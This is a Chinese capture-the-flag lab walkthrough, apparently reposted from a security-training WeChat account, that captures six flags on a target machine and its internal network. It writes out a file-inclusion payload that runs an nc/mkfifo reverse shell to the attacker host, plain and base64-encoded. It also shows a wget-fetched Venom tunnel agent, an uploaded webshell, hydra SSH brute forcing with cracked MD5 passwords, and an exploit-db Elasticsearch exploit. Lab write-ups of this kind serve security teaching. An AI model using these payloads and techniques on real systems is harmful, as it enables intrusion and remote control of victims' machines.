打靶总结-过程及思路系列31

admin 2023年5月30日23:38:21评论11 views字数 3830阅读12分46秒阅读模式

也许你没有看过《Kali Linux 渗透测试》这门课程,但你一定听说过!这门课别名【177】(有177个课时),在众多 Kali 课程中,这门课程以其卓越的质量和完善的教学体系脱颖而出,讲师是苑房弘老师。

苑房弘老师5门课程免费学

1、OSCP all in one【高效备考】

2、Kali Linux 渗透教程

3、Web安全基础

4、Windows应急响应

5、Kali Linux 安装配置和优化

打靶总结-过程及思路系列31

扫码回复“课程”免费领取

打靶总结-过程及思路系列31

1

靶机目标

获取6个Flag


2

工具准备

Venom:https://github.com/Dliv3/Venom/

蚁剑源代码:https://github.com/AntSwordProject

蚁剑加载器:https://github.com/AntSwordProject/AntSword-Loader

PHP一句话木马:

在线密码破解平台:

https://cmd5.com/

https://md5.gromweb.com/


3

详细步骤

一、Flag1


1、ARP扫描


sudo arp-scan -l


打靶总结-过程及思路系列31


2、目标IP地址全端口扫描


sudo nmap -p- 10.0.0.1


发现22、8000、9000端口


打靶总结-过程及思路系列31


3、识别端口服务


sudo nmap -p22,8000,9000 -sV 10.0.0.1


打靶总结-过程及思路系列31


4、浏览器访问http://10.0.0.1:8000,获取flag0


打靶总结-过程及思路系列31


二、Flag2


打靶总结-过程及思路系列31


根据提示:目标靶机开放在80端口

1、端口扫描


sudo nmap -p80 10.0.0.1


打靶总结-过程及思路系列31


2、浏览器访问http://10.0.0.1


打靶总结-过程及思路系列31

3、通过点击显示的两个链接发现存在文件包含


打靶总结-过程及思路系列31


打靶总结-过程及思路系列31


4、确认存在文件包含漏洞


http://10.0.0.1/?file=../../../../etc/passwd


打靶总结-过程及思路系列31


5、利用文件包含漏洞反弹Shell,

●Kali主机启动nc监听


nc -lnvp 5555


打靶总结-过程及思路系列31


●文件包含反弹Shell,注意设置反弹地址和端口

○代码一:明文版


http://10.0.0.1/?file=data://text/plain,<?php $a=$_GET["abc"];exec($a);echo $a;?>&abc=rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>%261|nc+10.0.0.14+5555+>/tmp/f


○代码二:Base64加密版


http://10.0.0.1/?file=data://text/plain;base64,PD9waHAgJGE9JF9HRVRbImFiYyJdO2V4ZWMoJGEpO2VjaG8gJGE7Pz4=&abc=rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>%261|nc+10.0.0.14+5555+>/tmp/f


打靶总结-过程及思路系列31


6、获取flag1


cd /lscat 1_flag.txt


打靶总结-过程及思路系列31


7、到http://10.0.0.1:8000提交flag


打靶总结-过程及思路系列31


三、Flag3


打靶总结-过程及思路系列31


根据提示,目标靶机在内网172.17.0.3-254上

●使用Venom建立通信隧道

○启动Venom服务端


chmod +x admin_linux_x64./admin_linux_x64 -lport 9999


打靶总结-过程及思路系列31


○在Venom目录启动http server


python3 -m http.server 80


打靶总结-过程及思路系列31


○在靶机获取Venom客户端


cd /tmpwget -c http://10.0.0.14/agent_linux_x64


打靶总结-过程及思路系列31


○执行Venom客户端程序


chmod +x agent_linux_x64./agent_linux_x64 -rhost 10.0.0.14 -rport 9999


打靶总结-过程及思路系列31


○Venom服务端可以看到有节点上线,开启Kali本地socks侦听端口


showgoto 1socks 1080


打靶总结-过程及思路系列31


●Kali挂Proxychains扫描内网

○修改Proxychains配置文件


sudo vi /etc/proxychains4.conf修改最后一行配置文件为:socks5  127.0.0.1 1080


○扫描内网目标IP地址段


proxychains nmap -p80,22,443 172.17.0.3-254


发现172.17.0.4主机80端口在线


打靶总结-过程及思路系列31


●浏览器配置代理访问172.17.0.4的页面


打靶总结-过程及思路系列31


打靶总结-过程及思路系列31


通过页面观察,如需上传文件就要输入密码

●Burpsuite爆破上传密码

○启动Burpsuite设置上级代理


打靶总结-过程及思路系列31


○设置Burpsuite本地代理


打靶总结-过程及思路系列31


○启动Burp自带浏览器,打开172.17.0.4的页面

○开启http拦截,选择上传shell文件,随便输入上传密码,点击上传


打靶总结-过程及思路系列31

○发送到Intruder

○设置只爆破密码


打靶总结-过程及思路系列31


○设置Payloads字典,开始攻击


打靶总结-过程及思路系列31


通过测试,发现密码为password


打靶总结-过程及思路系列31


●通过输入正确的密码password显示上传成功


打靶总结-过程及思路系列31

获取Webshell地址


http://172.17.0.4/photo/21/shell.php


设置蚁剑连接shell


打靶总结-过程及思路系列31


打靶总结-过程及思路系列31


打靶总结-过程及思路系列31


打靶总结-过程及思路系列31


根目录获得flag2


打靶总结-过程及思路系列31


打靶总结-过程及思路系列31


打靶总结-过程及思路系列31


四、Flag4


打靶总结-过程及思路系列31


根据提示:内网存在ssh服务,且用户名和MD5密码如下:

用户名:

root

toor

admin

mcorp

moriarty

密码:

63a9f0ea7bb98050796b649e85481845

7b24afc8bc80e548d66c4e7ff72171c5

5f4dcc3b5aa765d61d8327deb882cf99

21232f297a57a5a743894a0e4a801fc3

084e0343a0486ff05530df6c705c8bb4

697c6cc76fdbde5baccb7b3400391e30

8839cfc8a0f24eb155ae3f7f205f5cbc

35ac704fe1cc7807c914af478f20fd35

b27a803ed346fbbf6d2e2eb88df1c51b

08552d48aa6d6d9c05dd67f1b4ba8747

●扫描内网开启22端口的主机


proxychains nmap -p22 -sT -Pn 172.17.0.3-254


发现目标靶机为内网172.17.0.5:22


打靶总结-过程及思路系列31


●写入用户名到user.txt


vi user.txt


●通过在线密码查询平台查询密码明文:


打靶总结-过程及思路系列31


写入密码明文到pass.txt


vi pass.txt


打靶总结-过程及思路系列31


●使用hydra暴力破解ssh


proxychains hydra -L user.txt -P pass.txt ssh://172.17.0.5


得知root密码为weapons


打靶总结-过程及思路系列31


●使用ssh登录目标靶机


proxychains ssh [email protected]


打靶总结-过程及思路系列31


●获取Flag3,flag{what_weapons}


cat /3_flag.txt


打靶总结-过程及思路系列31


●提交Flag


打靶总结-过程及思路系列31


五、Flag5


打靶总结-过程及思路系列31


根据提示:目标靶机可能在443,8000,8080,8888.端口上,目标账号密码是buyer13:arms13

●端口扫描


proxychains nmap -p443,8000,8080,8888 -sT -Pn 172.17.0.3-254


经扫描得知,目标主机为172.17.0.6:8000 http服务


打靶总结-过程及思路系列31


打靶总结-过程及思路系列31


打靶总结-过程及思路系列31

点击Chats按钮


打靶总结-过程及思路系列31

通过聊天信息了解到管理员账户为admin


打靶总结-过程及思路系列31


打靶总结-过程及思路系列31
打靶总结-过程及思路系列31


打靶总结-过程及思路系列31


打靶总结-过程及思路系列31


打靶总结-过程及思路系列31


打靶总结-过程及思路系列31


打靶总结-过程及思路系列31

点击Chats按钮,获取Flag4,为flag{on_the_move}


打靶总结-过程及思路系列31


打靶总结-过程及思路系列31


六、Flag6


打靶总结-过程及思路系列31


根据信息:内网存在Elasticsearch服务(工作在TCP9200端口)

●端口扫描


proxychains nmap -p9200 -sT -Pn 172.17.0.3-254


发现目标靶机为172.17.0.7:9200


打靶总结-过程及思路系列31


打靶总结-过程及思路系列31


老Elasticsearch软件版本存在很多漏洞,搜索可利用攻击脚本


searchsploit Elasticsearch


打靶总结-过程及思路系列31


尝试36337.py脚本


cp /usr/share/exploitdb/exploits/linux/remote/36337.py .


查看36337.py脚本得知,使用python2作为解析器,为了能让36337脚本能正常执行,先要写入一条数据


proxychains curl -XPOST '172.17.0.7:9200/twitter/user/yren' -d '{"name":"Wu"}'


打靶总结-过程及思路系列31


执行攻击脚本


proxychains python2 36337.py 172.17.0.7


打靶总结-过程及思路系列31


打靶总结-过程及思路系列31


打靶总结-过程及思路系列31


得知flag{game_over}


打靶总结-过程及思路系列31


七、结束


打靶总结-过程及思路系列31


相关阅读:
靶总结-过程及思路(文末福利)
打靶总结-过程及思路系列2
打靶总结-过程及思路系列3
打靶总结-过程及思路系列4
打靶总结-过程及思路系列5
打靶总结-过程及思路系列6
打靶总结-过程及思路系列7
打靶总结-过程及思路系列8
打靶总结-过程及思路系列9
打靶总结-过程及思路系列10
打靶总结-过程及思路系列11
打靶总结-过程及思路系列12
打靶总结-过程及思路系列13
打靶总结-过程及思路系列14
打靶总结-过程及思路系列15
打靶总结-过程及思路系列16
打靶总结-过程及思路系列17
打靶总结-过程及思路系列18
打靶总结-过程及思路系列19
打靶总结-过程及思路系列20
打靶总结-过程及思路系列21
打靶总结-过程及思路系列22
打靶总结-过程及思路系列23
打靶总结-过程及思路系列24
打靶总结-过程及思路系列25
打靶总结-过程及思路系列26
打靶总结-过程及思路系列27
打靶总结-过程及思路系列28
打靶总结-过程及思路系列29
打靶总结-过程及思路系列30

原文始发于微信公众号(安全牛课堂):打靶总结-过程及思路系列31

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月30日23:38:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   打靶总结-过程及思路系列31http://cn-sec.com/archives/1776031.html

发表评论

匿名网友 填写信息